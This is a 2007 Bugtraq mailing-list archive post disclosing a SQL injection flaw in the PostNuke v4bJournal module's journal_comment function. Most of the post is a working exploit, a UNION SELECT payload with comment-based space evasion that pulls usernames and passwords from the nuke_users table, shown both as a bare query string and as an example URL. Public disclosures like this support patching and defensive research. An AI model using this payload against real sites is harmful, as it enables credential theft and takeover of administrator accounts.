Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Post Nuke v4bJournal Module Sql Inject
From: abbasi () ustmb ac ir
Date: 2 May 2007 17:59:34 -0000
----------------------------------------

PostNuke Journal

----------------------------------------

                                   

                    DISCOVERED BY :Ali Abbasi
Olom Fonon Mazandaran University - Security Research Center, Babol, Iran
       
   Greetz For All Y! UnderGround Group Members ( www.2600.ir )

    Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )

         Contact:     abbasi () ustmb ac ir





                                   {SQL BUG}







in 

    index.php?module=v4bJournal&func=journal_comment&id=(SQL)









------------------------------------------



         EXPLIOT BY :ABDUCTER

Greetz For ABDUCTER Real Friend Nanos (Nancy)

Contact:   ABDUCTER_MINDS () YAHOO COM 

 





   
index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*



EX:- 

http://www.example.com/index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*





U must regrister first ( You Most Have An Account On Vulnerable Site )

-------------------------------------------

  By Date           By Thread  

Current thread:
  • Post Nuke v4bJournal Module Sql Inject abbasi (May 02)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]